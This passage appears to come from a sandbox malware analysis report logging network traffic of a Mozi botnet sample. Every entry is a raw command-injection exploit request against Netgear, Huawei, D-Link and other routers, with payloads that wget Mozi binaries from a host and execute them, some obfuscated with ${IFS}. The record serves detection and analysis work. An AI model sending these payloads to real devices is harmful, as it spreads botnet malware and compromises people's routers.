huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 214.67.240.111:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 88.13.22.102:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 18.187.186.11:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 150.84.103.83:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 128.120.223.143:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 2.57.120.199:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 22.22.88.44:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
